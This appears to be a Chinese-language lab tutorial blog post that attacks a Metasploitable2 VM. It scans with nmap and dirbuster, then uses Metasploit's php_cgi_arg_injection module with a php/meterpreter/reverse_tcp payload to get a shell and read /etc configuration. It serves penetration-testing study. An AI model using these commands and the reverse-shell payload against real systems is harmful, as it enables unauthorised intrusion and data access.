Msf溢出phpMyAdmin

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令

环境
kali linux 攻击机:ip 192.168.235.149
metasploitable2 目标机:ip 192.168.235.140

步骤

1、 确保目标机与攻击机能够ping通
在这里插入图片描述
2、 对目标主机进行端口扫描,使用nmap -sV -v 192.168.235.140
在这里插入图片描述
可以看到Apache服务的端口是开着的
3、 浏览器中输入地址192.168.235.140 访问目标主机
在这里插入图片描述
4、 终端中输入dirbuster 启动扫描软件进行扫描
在这里插入图片描述
在Target URL中输入目标主机地址:192.168.235.140 点击“Browse”按钮选择字典文件“/usr/share/dirbuster/wordlists/directory-list-1.0.txt”点击star 开始扫描
在这里插入图片描述
扫描结果显示
在这里插入图片描述
有PHPmyadmin和cgi的目录信息
5、 终端输入msfconsole 打开msf,msf终端中输入search php_cgi 搜索有关CGI php的攻击模块
在这里插入图片描述
6、 终端中输入use exploit/multi/http/php_cgi_arg_injection
Show options
在这里插入图片描述
7、 Show payload可以看到选项里有 payloads相关的攻击载荷模块
在这里插入图片描述
这里我们选择php/meterpreter/reverse_tcp
8、 这里利用meterpreter取得shell连接 set PAYLOAD php/meterpreter/reverse_tcp
在这里插入图片描述
9、 show options 查看有什么参数
在这里插入图片描述
这里我们设置源主机 LHOST 192.168.235.149 设置目标主机 RHOST 192.168.235.140
在这里插入图片描述
输入run开始攻击
在这里插入图片描述
拿到meterpreter
10、 终端中输入 sysinfo
在这里插入图片描述
可以看到相关的信息
看到etc下的配置文件
在这里插入图片描述
可以看到Apache服务器的信息

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值